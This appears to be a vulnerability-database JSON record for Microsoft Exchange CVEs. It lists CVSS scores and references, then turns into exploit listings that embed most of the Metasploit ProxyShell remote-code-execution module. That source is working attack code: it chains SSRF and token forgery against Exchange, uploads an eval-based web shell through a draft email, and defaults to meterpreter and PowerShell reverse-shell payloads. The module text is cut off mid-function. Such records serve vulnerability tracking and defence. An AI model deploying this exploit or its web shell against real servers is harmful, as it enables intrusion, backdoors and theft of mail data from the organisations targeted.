"confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-13T07:00:00", "type": "mscve", "title": "Microsoft Exchange Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28480", "CVE-2021-28481", "CVE-2021-28482", "CVE-2021-28483"], "modified": "2021-04-13T07:00:00", "id": "MS:CVE-2021-28480", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-28480", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-14T15:25:26", "description": "Microsoft Exchange Information Disclosure Vulnerability", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-07-13T07:00:00", "type": "mscve", "title": "Microsoft Exchange Server Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33766"], "modified": "2021-07-13T07:00:00", "id": "MS:CVE-2021-33766", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-33766", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-06-14T15:25:19", "description": "Microsoft Exchange Server Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-33768, CVE-2021-34523.", "cvss3": {"exploitabilityScore": 2.1, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.0, "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-13T07:00:00", "type": "mscve", "title": "Microsoft Exchange Server Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 5.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.2, "vectorString": "AV:A/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33768", "CVE-2021-34470", "CVE-2021-34523"], "modified": "2021-07-13T07:00:00", "id": "MS:CVE-2021-34470", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34470", "cvss": {"score": 5.2, "vector": "AV:A/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-14T15:25:26", "description": "Microsoft Exchange Server Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-34470, CVE-2021-34523.", "cvss3": {"exploitabilityScore": 2.1, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.0, "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-13T07:00:00", "type": "mscve", "title": "Microsoft Exchange Server Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 5.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.2, "vectorString": "AV:A/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33768", "CVE-2021-34470", "CVE-2021-34523"], "modified": "2021-07-13T07:00:00", "id": "MS:CVE-2021-33768", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-33768", "cvss": {"score": 5.2, "vector": "AV:A/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-14T15:25:29", "description": "Microsoft Exchange Server Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-33768, CVE-2021-34470.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-13T07:00:00", "type": "mscve", "title": "Microsoft Exchange Server Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33768", "CVE-2021-34470", "CVE-2021-34523"], "modified": "2021-07-13T07:00:00", "id": "MS:CVE-2021-34523", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34523", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-14T15:25:37", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31196, CVE-2021-34473.", "cvss3": {"exploitabilityScore": 2.1, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.0, "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-13T07:00:00", "type": "mscve", "title": "Microsoft Exchange Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 5.5, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.9, "vectorString": "AV:A/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31196", "CVE-2021-31206", "CVE-2021-34473"], "modified": "2021-07-13T07:00:00", "id": "MS:CVE-2021-31206", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31206", "cvss": {"score": 7.9, "vector": "AV:A/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-14T15:25:29", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31196, CVE-2021-31206.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-13T07:00:00", "type": "mscve", "title": "Microsoft Exchange Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31196", "CVE-2021-31206", "CVE-2021-34473"], "modified": "2021-07-13T07:00:00", "id": "MS:CVE-2021-34473", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34473", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-14T15:25:37", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31206, CVE-2021-34473.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-13T07:00:00", "type": "mscve", "title": "Microsoft Exchange Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31196", "CVE-2021-31206", "CVE-2021-34473"], "modified": "2021-07-13T07:00:00", "id": "MS:CVE-2021-31196", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31196", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2023-05-27T14:46:20", "description": "[Description]\rFirst, IT'S NOT PROXYLOGON. IT'S NOT PROXYLOGON. IT'S NOT PROXYLOGON. \rIt's an unpublished vulnerability found by myself. It's not exploited in the wild and there's no exploit code on the Internet.\r [About The Vulnerability]\rIt's a exploit chain utilizing pre-auth SSRF + post-auth EoP + post-auth file write to achieve pre-auth RCE on Exchange Server. The corresponding CVE numbers are:\r- CVE-2021-28480, CVSS score 10\r- CVE-2021-28481, CVSS score 10\r- CVE-2021-28482, CVSS score 9\r This exploit chain is not memory corruption bug so it's stable, easy to use, and no privilege required, the only limit is you must provide one victim's email as argument.\r [Affect Versions]\r- Exchange Server 2019 < 15.02.0858.010\r- Exchange Server 2019 < 15.02.0792.013\r- Exchange Server 2016 < 15.01.2242.008\r- Exchange Server 2016 < 15.01.2176.012\r- Exchange Server 2013 < 15.00.1497.015\r Video: https://0day.today/videos/36585.mp4", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-22T00:00:00", "type": "zdt", "title": "Microsoft Exchange Server Unpublished Pre-Authentication Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28480", "CVE-2021-28481", "CVE-2021-28482"], "modified": "2021-07-22T00:00:00", "id": "1337DAY-ID-36585", "href": "https://0day.today/exploit/description/36585", "sourceData": "", "sourceHref": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-07T09:12:52", "description": "This Metasploit module exploits a vulnerability on Microsoft Exchange Server that allows an attacker to bypass the authentication, impersonate an arbitrary user, and write an arbitrary file to achieve remote code execution. By taking advantage of this vulnerability, you can execute arbitrary commands on the remote Microsoft Exchange Server. This vulnerability affects Exchange 2013 CU23 versions before 15.0.1497.15, Exchange 2016 CU19 versions before 15.1.2176.12, Exchange 2016 CU20 versions before 15.1.2242.5, Exchange 2019 CU8 versions before 15.2.792.13, and Exchange 2019 CU9 versions before 15.2.858.9.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-21T00:00:00", "type": "zdt", "title": "Microsoft Exchange ProxyShell Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-08-21T00:00:00", "id": "1337DAY-ID-36667", "href": "https://0day.today/exploit/description/36667", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'winrm'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::CmdStager\n include Msf::Exploit::FileDropper\n include Msf::Exploit::Powershell\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::EXE\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Microsoft Exchange ProxyShell RCE',\n 'Description' => %q{\n This module exploit a vulnerability on Microsoft Exchange Server that\n allows an attacker to bypass the authentication (CVE-2021-31207), impersonate an\n arbitrary user (CVE-2021-34523) and write an arbitrary file (CVE-2021-34473) to achieve\n the RCE (Remote Code Execution).\n\n By taking advantage of this vulnerability, you can execute arbitrary\n commands on the remote Microsoft Exchange Server.\n\n This vulnerability affects Exchange 2013 CU23 < 15.0.1497.15,\n Exchange 2016 CU19 < 15.1.2176.12, Exchange 2016 CU20 < 15.1.2242.5,\n Exchange 2019 CU8 < 15.2.792.13, Exchange 2019 CU9 < 15.2.858.9.\n\n All components are vulnerable by default.\n },\n 'Author' => [\n 'Orange Tsai', # Discovery\n 'Jang (@testanull)', # Vulnerability analysis\n 'PeterJson', # Vulnerability analysis\n 'brandonshi123', # Vulnerability analysis\n 'mekhalleh (RAMELLA S\u00e9bastien)', # exchange_proxylogon_rce template\n 'Spencer McIntyre', # Metasploit module\n 'wvu' # Testing\n ],\n 'References' => [\n [ 'CVE', '2021-34473' ],\n [ 'CVE', '2021-34523' ],\n [ 'CVE', '2021-31207' ],\n [ 'URL', 'https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1' ],\n [ 'URL', 'https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf' ],\n [ 'URL', 'https://y4y.space/2021/08/12/my-steps-of-reproducing-proxyshell/' ]\n ],\n 'DisclosureDate' => '2021-04-06', # pwn2own 2021\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Platform' => ['windows'],\n 'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Windows Powershell',\n {\n 'Platform' => 'windows',\n 'Arch' => [ARCH_X64, ARCH_X86],\n 'Type' => :windows_powershell,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n }\n }\n ],\n [\n 'Windows Dropper',\n {\n 'Platform' => 'windows',\n 'Arch' => [ARCH_X64, ARCH_X86],\n 'Type' => :windows_dropper,\n 'CmdStagerFlavor' => %i[psh_invokewebrequest],\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',\n 'CMDSTAGER::FLAVOR' => 'psh_invokewebrequest'\n }\n }\n ],\n [\n 'Windows Command',\n {\n 'Platform' => 'windows',\n 'Arch' => [ARCH_CMD],\n 'Type' => :windows_command,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],\n 'AKA' => ['ProxyShell'],\n 'Reliability' => [REPEATABLE_SESSION]\n }\n )\n )\n\n register_options([\n OptString.new('EMAIL', [true, 'A known email address for this organization']),\n OptBool.new('UseAlternatePath', [true, 'Use the IIS root dir as alternate path', false]),\n ])\n\n register_advanced_options([\n OptString.new('BackendServerName', [false, 'Force the name of the backend Exchange server targeted']),\n OptString.new('ExchangeBasePath', [true, 'The base path where exchange is installed', 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15']),\n OptString.new('ExchangeWritePath', [true, 'The path where you want to write the backdoor', 'owa\\\\auth']),\n OptString.new('IISBasePath', [true, 'The base path where IIS wwwroot directory is', 'C:\\\\inetpub\\\\wwwroot']),\n OptString.new('IISWritePath', [true, 'The path where you want to write the backdoor', 'aspnet_client']),\n OptString.new('MapiClientApp', [true, 'This is MAPI client version sent in the request', 'Outlook/15.0.4815.1002']),\n OptString.new('UserAgent', [true, 'The HTTP User-Agent sent in the request', 'Mozilla/5.0'])\n ])\n end\n\n def check\n @ssrf_email ||= Faker::Internet.email\n res = send_http('GET', '/mapi/nspi/')\n return CheckCode::Unknown if res.nil?\n return CheckCode::Safe unless res.code == 200 && res.get_html_document.xpath('//head/title').text == 'Exchange MAPI/HTTP Connectivity Endpoint'\n\n CheckCode::Vulnerable\n end\n\n def cmd_windows_generic?\n datastore['PAYLOAD'] == 'cmd/windows/generic'\n end\n\n def encode_cmd(cmd)\n cmd.gsub!('\\\\', '\\\\\\\\\\\\')\n cmd.gsub('\"', '\\u0022').gsub('&', '\\u0026').gsub('+', '\\u002b')\n end\n\n def random_mapi_id\n id = \"{#{Rex::Text.rand_text_hex(8)}\"\n id = \"#{id}-#{Rex::Text.rand_text_hex(4)}\"\n id = \"#{id}-#{Rex::Text.rand_text_hex(4)}\"\n id = \"#{id}-#{Rex::Text.rand_text_hex(4)}\"\n id = \"#{id}-#{Rex::Text.rand_text_hex(12)}}\"\n id.upcase\n end\n\n def request_autodiscover(_server_name)\n xmlns = { 'xmlns' => 'http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a' }\n\n response = send_http(\n 'POST',\n '/autodiscover/autodiscover.xml',\n data: soap_autodiscover,\n ctype: 'text/xml; charset=utf-8'\n )\n\n case response.body\n when %r{<ErrorCode>500</ErrorCode>}\n fail_with(Failure::NotFound, 'No Autodiscover information was found')\n when %r{<Action>redirectAddr</Action>}\n fail_with(Failure::NotFound, 'No email address was found')\n end\n\n xml = Nokogiri::XML.parse(response.body)\n\n legacy_dn = xml.at_xpath('//xmlns:User/xmlns:LegacyDN', xmlns)&.content\n fail_with(Failure::NotFound, 'No \\'LegacyDN\\' was found') if legacy_dn.nil? || legacy_dn.empty?\n\n server = ''\n xml.xpath('//xmlns:Account/xmlns:Protocol', xmlns).each do |item|\n type = item.at_xpath('./xmlns:Type', xmlns)&.content\n if type == 'EXCH'\n server = item.at_xpath('./xmlns:Server', xmlns)&.content\n end\n end\n fail_with(Failure::NotFound, 'No \\'Server ID\\' was found') if server.nil? || server.empty?\n\n { server: server, legacy_dn: legacy_dn }\n end\n\n def request_fqdn\n ntlm_ssp = \"NTLMSSP\\x00\\x01\\x00\\x00\\x00\\x05\\x02\\x88\\xa0\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n received = send_request_raw(\n 'method' => 'RPC_IN_DATA',\n 'uri' => normalize_uri('rpc', 'rpcproxy.dll'),\n 'headers' => {\n 'Authorization' => \"NTLM #{Rex::Text.encode_base64(ntlm_ssp)}\"\n }\n )\n fail_with(Failure::TimeoutExpired, 'Server did not respond in an expected way') unless received\n\n if received.code == 401 && received['WWW-Authenticate'] && received['WWW-Authenticate'].match(/^NTLM/i)\n hash = received['WWW-Authenticate'].split('NTLM ')[1]\n message = Net::NTLM::Message.parse(Rex::Text.decode_base64(hash))\n dns_server = Net::NTLM::TargetInfo.new(message.target_info).av_pairs[Net::NTLM::TargetInfo::MSV_AV_DNS_COMPUTER_NAME]\n\n return dns_server.force_encoding('UTF-16LE').encode('UTF-8').downcase\n end\n\n fail_with(Failure::NotFound, 'No Backend server was found')\n end\n\n # https://docs.microsoft.com/en-us/openspecs/exchange_server_protocols/ms-oxcmapihttp/c245390b-b115-46f8-bc71-03dce4a34bff\n def request_mapi(_server_name, legacy_dn)\n data = \"#{legacy_dn}\\x00\\x00\\x00\\x00\\x00\\xe4\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x00\\x00\\x00\\x00\"\n headers = {\n 'X-RequestType' => 'Connect',\n 'X-ClientInfo' => random_mapi_id,\n 'X-ClientApplication' => datastore['MapiClientApp'],\n 'X-RequestId' => \"#{random_mapi_id}:#{Rex::Text.rand_text_numeric(5)}\"\n }\n\n sid = ''\n response = send_http(\n 'POST',\n '/mapi/emsmdb',\n data: data,\n ctype: 'application/mapi-http',\n headers: headers\n )\n if response&.code == 200\n sid = response.body.match(/S-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*/).to_s\n end\n fail_with(Failure::NotFound, 'No \\'SID\\' was found') if sid.empty?\n\n sid\n end\n\n # pre-authentication SSRF (Server Side Request Forgery) + impersonate as admin.\n def run_cve_2021_34473\n if datastore['BackendServerName'] && !datastore['BackendServerName'].empty?\n server_name = datastore['BackendServerName']\n print_status(\"Internal server name forced to: #{server_name}\")\n else\n print_status('Retrieving backend FQDN over RPC request')\n server_name = request_fqdn\n print_status(\"Internal server name: #{server_name}\")\n end\n @backend_server_name = server_name\n\n # get information via an autodiscover request.\n print_status('Sending autodiscover request')\n autodiscover = request_autodiscover(server_name)\n\n print_status(\"Server: #{autodiscover[:server]}\")\n print_status(\"LegacyDN: #{autodiscover[:legacy_dn]}\")\n\n # get the user UID using mapi request.\n print_status('Sending mapi request')\n mailbox_user_sid = request_mapi(server_name, autodiscover[:legacy_dn])\n print_status(\"SID: #{mailbox_user_sid} (#{datastore['EMAIL']})\")\n\n send_payload(mailbox_user_sid)\n @common_access_token = build_token(mailbox_user_sid)\n end\n\n def send_http(method, uri, opts = {})\n ssrf = \"Autodiscover/autodiscover.json?a=#{@ssrf_email}\"\n unless opts[:cookie] == :none\n opts[:cookie] = \"Email=#{ssrf}\"\n end\n\n request = {\n 'method' => method,\n 'uri' => \"/#{ssrf}#{uri}\",\n 'agent' => datastore['UserAgent'],\n 'ctype' => opts[:ctype],\n 'headers' => { 'Accept' => '*/*', 'Cache-Control' => 'no-cache', 'Connection' => 'keep-alive' }\n }\n request = request.merge({ 'data' => opts[:data] }) unless opts[:data].nil?\n request = request.merge({ 'cookie' => opts[:cookie] }) unless opts[:cookie].nil?\n request = request.merge({ 'headers' => opts[:headers] }) unless opts[:headers].nil?\n\n received = send_request_cgi(request)\n fail_with(Failure::TimeoutExpired, 'Server did not respond in an expected way') unless received\n\n received\n end\n\n def send_payload(user_sid)\n @shell_input_name = rand_text_alphanumeric(8..12)\n @draft_subject = rand_text_alphanumeric(8..12)\n payload = Rex::Text.encode_base64(PstEncoding.encode(\"#<script language=\\\"JScript\\\" runat=\\\"server\\\">function Page_Load(){eval(Request[\\\"#{@shell_input_name}\\\"],\\\"unsafe\\\");}</script>\"))\n file_name = \"#{Faker::Lorem.word}#{%w[- _].sample}#{Faker::Lorem.word}.#{%w[rtf pdf docx xlsx pptx zip].sample}\"\n envelope = XMLTemplate.render('soap_draft', user_sid: user_sid, file_content: payload, file_name: file_name, subject: @draft_subject)\n\n send_http('POST', '/ews/exchange.asmx', data: envelope, ctype: 'text/xml;charset=UTF-8')\n end\n\n def soap_autodiscover\n <<~SOAP\n <?xml version=\"1.0\" encoding=\"utf-8\"?>\n <Autodiscover xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006\">\n <Request>\n <EMailAddress>#{datastore['EMAIL'].encode(xml: :text)}</EMailAddress>\n <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>\n </Request>\n </Autodiscover>\n SOAP\n end\n\n def web_directory\n if datastore['UseAlternatePath']\n datastore['IISWritePath'].gsub('\\\\', '/')\n else\n datastore['ExchangeWritePath'].gsub('\\\\', '/')\n end\n end\n\n def build_token(sid)\n uint8_tlv = proc do |type, value|\n type + [value.length].pack('C') + value\n end\n\n token = uint8_tlv.call('V', \"\\x00\")\n token << uint8_tlv.call('T', 'Windows')\n token << \"\\x43\\x00\"\n token << uint8_tlv.call('A', 'Kerberos')\n token << uint8_tlv.call('L', datastore['EMAIL'])\n token << uint8_tlv.call('U', sid)\n\n # group data for S-1-5-32-544\n token << \"\\x47\\x01\\x00\\x00\\x00\\x07\\x00\\x00\\x00\\x0c\\x53\\x2d\\x31\\x2d\\x35\\x2d\\x33\\x32\\x2d\\x35\\x34\\x34\\x45\\x00\\x00\\x00\\x00\"\n Rex::Text.encode_base64(token)\n end\n\n def execute_powershell(cmdlet, args: [])\n winrm = SSRFWinRMConnection.new({\n endpoint: full_uri('PowerShell/'),\n transport: :ssrf,\n ssrf_proc: proc do |method, uri, opts|\n uri = 